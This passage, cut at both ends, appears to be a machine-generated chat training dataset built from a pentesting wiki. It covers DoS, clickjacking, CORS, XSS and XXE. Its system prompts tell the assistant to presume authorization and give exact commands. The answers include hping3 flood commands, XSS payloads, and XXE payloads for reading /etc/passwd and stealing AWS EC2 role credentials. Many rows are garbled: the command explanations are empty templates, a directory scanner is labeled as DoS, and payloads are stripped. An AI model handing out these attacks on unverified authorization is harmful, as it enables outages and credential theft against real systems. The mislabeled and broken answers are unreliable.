requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through 🛠️ Denial of Service (DoS) - Websites", "response": "hping3 --rand-source --flood $TARGET_IP", "metadata": {"corpus_index": 1713, "category": "web", "source_file": "docs/src/web/config/dos-mitigations.md", "page_title": "🛠️ Denial of Service (DoS)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `hping3 --rand-source --flood $TARGET_IP`?"}, {"role": "assistant", "content": "This command is used for 🛠️ denial of service (dos) - websites. Websites"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `hping3 --rand-source --flood $TARGET_IP`?", "response": "This command is used for 🛠️ denial of service (dos) - websites. Websites", "metadata": {"corpus_index": 1713, "category": "web", "source_file": "docs/src/web/config/dos-mitigations.md", "page_title": "🛠️ Denial of Service (DoS)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use hping3 for 🛠️ denial of service (dos) - websites?"}, {"role": "assistant", "content": "hping3 -S --flood -V -p $TARGET_PORT $TARGET_IP"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use hping3 for 🛠️ denial of service (dos) - websites?", "response": "hping3 -S --flood -V -p $TARGET_PORT $TARGET_IP", "metadata": {"corpus_index": 1714, "category": "web", "source_file": "docs/src/web/config/dos-mitigations.md", "page_title": "🛠️ Denial of Service (DoS)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "hping3"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute 🛠️ Denial of Service (DoS) - Websites?"}, {"role": "assistant", "content": "hping3 -S --flood -V -p $TARGET_PORT $TARGET_IP"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute 🛠️ Denial of Service (DoS) - Websites?", "response": "hping3 -S --flood -V -p $TARGET_PORT $TARGET_IP", "metadata": {"corpus_index": 1714, "category": "web", "source_file": "docs/src/web/config/dos-mitigations.md", "page_title": "🛠️ Denial of Service (DoS)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `hping3 -S --flood -V -p $TARGET_PORT $TARGET_IP`?"}, {"role": "assistant", "content": "This command is used for 🛠️ denial of service (dos) - websites. Websites"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `hping3 -S --flood -V -p $TARGET_PORT $TARGET_IP`?", "response": "This command is used for 🛠️ denial of service (dos) - websites. Websites", "metadata": {"corpus_index": 1714, "category": "web", "source_file": "docs/src/web/config/dos-mitigations.md", "page_title": "🛠️ Denial of Service (DoS)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the feroxbuster command to 🛠️ denial of service (dos) - websites"}, {"role": "assistant", "content": "feroxbuster -H \"User-Agent: PENTEST\" -w $WORDLIST -u $TARGET_IP -t $THREADS"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the feroxbuster command to 🛠️ denial of service (dos) - websites", "response": "feroxbuster -H \"User-Agent: PENTEST\" -w $WORDLIST -u $TARGET_IP -t $THREADS", "metadata": {"corpus_index": 1715, "category": "web", "source_file": "docs/src/web/config/dos-mitigations.md", "page_title": "🛠️ Denial of Service (DoS)", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "feroxbuster"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for 🛠️ Denial of Service (DoS) - Websites"}, {"role": "assistant", "content": "feroxbuster -H \"User-Agent: PENTEST\" -w $WORDLIST -u $TARGET_IP -t $THREADS"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for 🛠️ Denial of Service (DoS) - Websites", "response": "feroxbuster -H \"User-Agent: PENTEST\" -w $WORDLIST -u $TARGET_IP -t $THREADS", "metadata": {"corpus_index": 1715, "category": "web", "source_file": "docs/src/web/config/dos-mitigations.md", "page_title": "🛠️ Denial of Service (DoS)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `feroxbuster -H \"User-Agent: PENTEST\" -w $WORDLIST -u $TARGET_IP -t $THREADS`?"}, {"role": "assistant", "content": "This command is used for 🛠️ denial of service (dos) - websites. Websites"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `feroxbuster -H \"User-Agent: PENTEST\" -w $WORDLIST -u $TARGET_IP -t $THREADS`?", "response": "This command is used for 🛠️ denial of service (dos) - websites. Websites", "metadata": {"corpus_index": 1715, "category": "web", "source_file": "docs/src/web/config/dos-mitigations.md", "page_title": "🛠️ Denial of Service (DoS)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Clickjacking - Theory"}, {"role": "assistant", "content": "Lots of websites allow to browsers to render them in a , \n \n\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Clickjacking - Practice?", "response": "![](<./assets/Clickjacking example.png>)\n(left) vulnerable | not vulnerable (right){.caption}\n\nThe following HTML code can be used in a browser to attempt a clickjacking on a target URL.\n\n``\n\n \n Clickjacking / framing test\n ​\n \n

Test a page for clickjacking/framing vulnerability

\n

Enter the URL to frame:

\n \n \n
\n
\n
\n
\n \n \n\n``", "metadata": {"corpus_index": 1717, "category": "web", "source_file": "docs/src/web/config/http-headers/clickjacking/index.md", "page_title": "Clickjacking", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Clickjacking - Practice"}, {"role": "assistant", "content": "![](<./assets/Clickjacking example.png>)\n(left) vulnerable | not vulnerable (right){.caption}\n\nThe following HTML code can be used in a browser to attempt a clickjacking on a target URL.\n\n``\n\n \n Clickjacking / framing test\n ​\n \n

Test a page for clickjacking/framing vulnerability

\n

Enter the URL to frame:

\n \n \n
\n
\n
\n
\n \n \n\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Clickjacking - Practice", "response": "![](<./assets/Clickjacking example.png>)\n(left) vulnerable | not vulnerable (right){.caption}\n\nThe following HTML code can be used in a browser to attempt a clickjacking on a target URL.\n\n``\n\n \n Clickjacking / framing test\n ​\n \n

Test a page for clickjacking/framing vulnerability

\n

Enter the URL to frame:

\n \n \n
\n
\n
\n
\n \n \n\n``", "metadata": {"corpus_index": 1717, "category": "web", "source_file": "docs/src/web/config/http-headers/clickjacking/index.md", "page_title": "Clickjacking", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Clickjacking - Practice?"}, {"role": "assistant", "content": "\n \n Clickjacking / framing test\n ​\n \n

Test a page for clickjacking/framing vulnerability

\n

Enter the URL to frame:

\n \n \n
\n
\n
\n
\n \n \n"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Clickjacking - Practice?", "response": "\n \n Clickjacking / framing test\n ​\n \n

Test a page for clickjacking/framing vulnerability

\n

Enter the URL to frame:

\n \n \n
\n
\n
\n
\n \n \n", "metadata": {"corpus_index": 1718, "category": "web", "source_file": "docs/src/web/config/http-headers/clickjacking/index.md", "page_title": "Clickjacking", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: ``?"}, {"role": "assistant", "content": "This command is used for clickjacking - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: ``?", "response": "This command is used for clickjacking - practice. Practice", "metadata": {"corpus_index": 1718, "category": "web", "source_file": "docs/src/web/config/http-headers/clickjacking/index.md", "page_title": "Clickjacking", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe 🛠️ CORS (Cross-Origin Resource Sharing) - Theory in the context of penetration testing"}, {"role": "assistant", "content": "Sometimes browsers need to load resources from another origin other than their own. The Same-Origin Policy mechanism (SOP) restricts access to resources on other origins. \n\n> [!TIP]\n> The same-origin is defined for two URLs that have the same protocol, port (if specified), and host.\n\nTo bypass this limitation, the JSON-P technique (in JavaScript) was introduced. To retrieve information from another origin, it uses the opening a pop-up window echoing \"XSS\". However, exploiting XSS is like playing \"cat and mouse\". Inputs can be filtered and filters can be bypassed. Here are some basic examples of XSS payloads.\n\n``\n\n\n\n<\n`\n\nThe following website (GitHub project) can help identify transformations applied to user inputs. This can help bypass filters and transformations to exploit XSS attacks.\n\nThe following payload is used for testing SQL injections, XSS (Cross-Site Scripting) and SSTI (Server-Side Template Injection).\n\n`\n'\"{{7*7}}\n``\n\nTools like XSStrike (Python), XSSer (Python), and Dalfox (Go) can also help in finding and exploiting XSS vulnerable input vectors by fuzzing them with unique payloads and then searching for unique patterns in the responses."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain XSS (Cross-Site Scripting) - Practice", "response": "Testers need to identify input vectors (parts of the app that accept content from the users) that are stored or reflected.\n\n* URI parameters for reflected and DOM-based XSS\n* Other user inputs in forums, chats, comments, posts, and other stored content for stored XSS\n* HTTP headers like Cookies (and even User-Agents in some cases)\n\nOne of the most famous payloads is opening a pop-up window echoing \"XSS\". However, exploiting XSS is like playing \"cat and mouse\". Inputs can be filtered and filters can be bypassed. Here are some basic examples of XSS payloads.\n\n``\n\n\n\n<\n`\n\nThe following website (GitHub project) can help identify transformations applied to user inputs. This can help bypass filters and transformations to exploit XSS attacks.\n\nThe following payload is used for testing SQL injections, XSS (Cross-Site Scripting) and SSTI (Server-Side Template Injection).\n\n`\n'\"{{7*7}}\n``\n\nTools like XSStrike (Python), XSSer (Python), and Dalfox (Go) can also help in finding and exploiting XSS vulnerable input vectors by fuzzing them with unique payloads and then searching for unique patterns in the responses.", "metadata": {"corpus_index": 1944, "category": "web", "source_file": "docs/src/web/inputs/xss.md", "page_title": "XSS (Cross-Site Scripting)", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on XSS (Cross-Site Scripting) - Practice"}, {"role": "assistant", "content": "Testers need to identify input vectors (parts of the app that accept content from the users) that are stored or reflected.\n\n* URI parameters for reflected and DOM-based XSS\n* Other user inputs in forums, chats, comments, posts, and other stored content for stored XSS\n* HTTP headers like Cookies (and even User-Agents in some cases)\n\nOne of the most famous payloads is opening a pop-up window echoing \"XSS\". However, exploiting XSS is like playing \"cat and mouse\". Inputs can be filtered and filters can be bypassed. Here are some basic examples of XSS payloads.\n\n``\n\n\n\n<\n`\n\nThe following website (GitHub project) can help identify transformations applied to user inputs. This can help bypass filters and transformations to exploit XSS attacks.\n\nThe following payload is used for testing SQL injections, XSS (Cross-Site Scripting) and SSTI (Server-Side Template Injection).\n\n`\n'\"{{7*7}}\n``\n\nTools like XSStrike (Python), XSSer (Python), and Dalfox (Go) can also help in finding and exploiting XSS vulnerable input vectors by fuzzing them with unique payloads and then searching for unique patterns in the responses."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on XSS (Cross-Site Scripting) - Practice", "response": "Testers need to identify input vectors (parts of the app that accept content from the users) that are stored or reflected.\n\n* URI parameters for reflected and DOM-based XSS\n* Other user inputs in forums, chats, comments, posts, and other stored content for stored XSS\n* HTTP headers like Cookies (and even User-Agents in some cases)\n\nOne of the most famous payloads is opening a pop-up window echoing \"XSS\". However, exploiting XSS is like playing \"cat and mouse\". Inputs can be filtered and filters can be bypassed. Here are some basic examples of XSS payloads.\n\n``\n\n\n\n<\n`\n\nThe following website (GitHub project) can help identify transformations applied to user inputs. This can help bypass filters and transformations to exploit XSS attacks.\n\nThe following payload is used for testing SQL injections, XSS (Cross-Site Scripting) and SSTI (Server-Side Template Injection).\n\n`\n'\"{{7*7}}\n``\n\nTools like XSStrike (Python), XSSer (Python), and Dalfox (Go) can also help in finding and exploiting XSS vulnerable input vectors by fuzzing them with unique payloads and then searching for unique patterns in the responses.", "metadata": {"corpus_index": 1944, "category": "web", "source_file": "docs/src/web/inputs/xss.md", "page_title": "XSS (Cross-Site Scripting)", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform XSS (Cross-Site Scripting) - Practice?"}, {"role": "assistant", "content": "\n\n\n<"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform XSS (Cross-Site Scripting) - Practice?", "response": "\n\n\n<", "metadata": {"corpus_index": 1945, "category": "web", "source_file": "docs/src/web/inputs/xss.md", "page_title": "XSS (Cross-Site Scripting)", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: ``?"}, {"role": "assistant", "content": "This command is used for xss (cross-site scripting) - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: ``?", "response": "This command is used for xss (cross-site scripting) - practice. Practice", "metadata": {"corpus_index": 1945, "category": "web", "source_file": "docs/src/web/inputs/xss.md", "page_title": "XSS (Cross-Site Scripting)", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about XXE injection - Theory"}, {"role": "assistant", "content": "Some web applications handle data and rely on the XML format to exchange data with the browsers.\n\n> XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.\n>\n> XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data (portswigger).\n\nXXE injections can sometimes lead to SSRF (Server-Side Request Forgery), Local File Disclosure, Sensitive Information Disclosure, Data Exfiltration, RCE (Remote Code Execution) and so on."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about XXE injection - Theory", "response": "Some web applications handle data and rely on the XML format to exchange data with the browsers.\n\n> XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.\n>\n> XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data (portswigger).\n\nXXE injections can sometimes lead to SSRF (Server-Side Request Forgery), Local File Disclosure, Sensitive Information Disclosure, Data Exfiltration, RCE (Remote Code Execution) and so on.", "metadata": {"corpus_index": 1946, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for XXE injection - Theory"}, {"role": "assistant", "content": "Some web applications handle data and rely on the XML format to exchange data with the browsers.\n\n> XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.\n>\n> XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data (portswigger).\n\nXXE injections can sometimes lead to SSRF (Server-Side Request Forgery), Local File Disclosure, Sensitive Information Disclosure, Data Exfiltration, RCE (Remote Code Execution) and so on."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for XXE injection - Theory", "response": "Some web applications handle data and rely on the XML format to exchange data with the browsers.\n\n> XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.\n>\n> XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data (portswigger).\n\nXXE injections can sometimes lead to SSRF (Server-Side Request Forgery), Local File Disclosure, Sensitive Information Disclosure, Data Exfiltration, RCE (Remote Code Execution) and so on.", "metadata": {"corpus_index": 1946, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe XXE injection - Identify an XXE injection vulnerability in the context of penetration testing"}, {"role": "assistant", "content": "Testers need to find inputs or forms that send XML formatted data to the application.\n\nFor instance, in the following request, the user submitted a search form with the input \"TESTINPUT\".\n\n``http\nPOST /action HTTP/1.1\nHost: some.website\n[...]\nConnection: close\n\n\n \n TESTINPUT\n\n`\n\nThe tester can detect if the XML parser parses the external entities by defining one inside a DOCTYPE element, and checking if the value in the from element gets replaced (the value will be replaced in the reflected messages sent by the application like error messages, search results).\n\n`xml\n\n ]>\n \n &newfrom;\n\n``\n\nA vulnerable application should replace the value by \"VULNERABLE\"."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe XXE injection - Identify an XXE injection vulnerability in the context of penetration testing", "response": "Testers need to find inputs or forms that send XML formatted data to the application.\n\nFor instance, in the following request, the user submitted a search form with the input \"TESTINPUT\".\n\n``http\nPOST /action HTTP/1.1\nHost: some.website\n[...]\nConnection: close\n\n\n \n TESTINPUT\n\n`\n\nThe tester can detect if the XML parser parses the external entities by defining one inside a DOCTYPE element, and checking if the value in the from element gets replaced (the value will be replaced in the reflected messages sent by the application like error messages, search results).\n\n`xml\n\n ]>\n \n &newfrom;\n\n``\n\nA vulnerable application should replace the value by \"VULNERABLE\".", "metadata": {"corpus_index": 1947, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute XXE injection - Identify an XXE injection vulnerability?"}, {"role": "assistant", "content": "Testers need to find inputs or forms that send XML formatted data to the application.\n\nFor instance, in the following request, the user submitted a search form with the input \"TESTINPUT\".\n\n``http\nPOST /action HTTP/1.1\nHost: some.website\n[...]\nConnection: close\n\n\n \n TESTINPUT\n\n`\n\nThe tester can detect if the XML parser parses the external entities by defining one inside a DOCTYPE element, and checking if the value in the from element gets replaced (the value will be replaced in the reflected messages sent by the application like error messages, search results).\n\n`xml\n\n ]>\n \n &newfrom;\n\n``\n\nA vulnerable application should replace the value by \"VULNERABLE\"."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute XXE injection - Identify an XXE injection vulnerability?", "response": "Testers need to find inputs or forms that send XML formatted data to the application.\n\nFor instance, in the following request, the user submitted a search form with the input \"TESTINPUT\".\n\n``http\nPOST /action HTTP/1.1\nHost: some.website\n[...]\nConnection: close\n\n\n \n TESTINPUT\n\n`\n\nThe tester can detect if the XML parser parses the external entities by defining one inside a DOCTYPE element, and checking if the value in the from element gets replaced (the value will be replaced in the reflected messages sent by the application like error messages, search results).\n\n`xml\n\n ]>\n \n &newfrom;\n\n``\n\nA vulnerable application should replace the value by \"VULNERABLE\".", "metadata": {"corpus_index": 1947, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use POST for xxe injection - identify an xxe injection vulnerability?"}, {"role": "assistant", "content": "POST /action HTTP/1.1\nHost: some.website\n[...]\nConnection: close\n\n\n \n TESTINPUT\n"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use POST for xxe injection - identify an xxe injection vulnerability?", "response": "POST /action HTTP/1.1\nHost: some.website\n[...]\nConnection: close\n\n\n \n TESTINPUT\n", "metadata": {"corpus_index": 1948, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "POST"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out XXE injection - Identify an XXE injection vulnerability during a pentest?"}, {"role": "assistant", "content": "POST /action HTTP/1.1\nHost: some.website\n[...]\nConnection: close\n\n\n \n TESTINPUT\n"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out XXE injection - Identify an XXE injection vulnerability during a pentest?", "response": "POST /action HTTP/1.1\nHost: some.website\n[...]\nConnection: close\n\n\n \n TESTINPUT\n", "metadata": {"corpus_index": 1948, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `POST /action HTTP/1.1`?"}, {"role": "assistant", "content": "This command is used for xxe injection - identify an xxe injection vulnerability. Identify an XXE injection vulnerability"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `POST /action HTTP/1.1`?", "response": "This command is used for xxe injection - identify an xxe injection vulnerability. Identify an XXE injection vulnerability", "metadata": {"corpus_index": 1948, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does XXE injection - Retrieve content of local files work?"}, {"role": "assistant", "content": "When the tester has identified a vulnerable entry point (see identify an XXE). He can try to disclose local files by replacing the from value with the content of a sensitive file (e.g. /etc/passwd).\n\n``xml\n\n ]>\n\n &newfrom;\n\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does XXE injection - Retrieve content of local files work?", "response": "When the tester has identified a vulnerable entry point (see identify an XXE). He can try to disclose local files by replacing the from value with the content of a sensitive file (e.g. /etc/passwd).\n\n``xml\n\n ]>\n\n &newfrom;\n\n``", "metadata": {"corpus_index": 1949, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for XXE injection - Retrieve content of local files"}, {"role": "assistant", "content": "When the tester has identified a vulnerable entry point (see identify an XXE). He can try to disclose local files by replacing the from value with the content of a sensitive file (e.g. /etc/passwd).\n\n``xml\n\n ]>\n\n &newfrom;\n\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for XXE injection - Retrieve content of local files", "response": "When the tester has identified a vulnerable entry point (see identify an XXE). He can try to disclose local files by replacing the from value with the content of a sensitive file (e.g. /etc/passwd).\n\n``xml\n\n ]>\n\n &newfrom;\n\n``", "metadata": {"corpus_index": 1949, "category": "web", "source_file": "docs/src/web/inputs/xxe-injection/index.md", "page_title": "XXE injection", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is XXE injection - Conduct an SSRF attack?"}, {"role": "assistant", "content": "An XXE can be exploited to conduct an SSRF. When an application performs data transfer using XML, the request can be intercepted and forwarded to an internal host as follow.\n\n``xml\n\n ]>\n\n &newfrom;\n\n`\n\n::: details Example: Get EC2 IAM role temporary credentials\nIn the following example, the attacker tries to access the AWS EC2 metadata service to retrieve the EC2 role credentials used by the server.\n\n`xml\n\n ]>\n&xxe;1\n`\n\nThe internal server will reveal the URL path to access the role's credentials as an error message at each step by displaying the HTTP response body of the accessed URL as follows: \n\n1. URL = \"http://169.254.169.254/latest/metadata/iam/security-credentials/\"\\\n The server will return an error message revealing the EC2 role name: invalid productId ec2-role-name_._\n\n1. URL = \"http://169.254.169.254/latest/metadata/iam/security-credentials/ec2-role-name\"\\\n The server will return an error message revealing the EC2 role's secrets as invalid productId`.\n\nFor more details, refer to the \"XXE to SSRF\" PortSwigger lab.\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is XXE injection - Conduct an SSRF attack?", "response": "An XXE can be exploited to conduct an SSRF. When an application performs data transfer using XML, the request can be intercepted and forwarded to an internal host as follow.\n\n``xml\n\n ]>\n\n 